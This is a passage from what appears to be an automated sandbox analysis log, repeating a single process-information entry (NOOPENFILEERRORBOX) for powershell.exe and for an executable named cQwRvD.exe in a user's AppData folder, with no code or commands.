                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
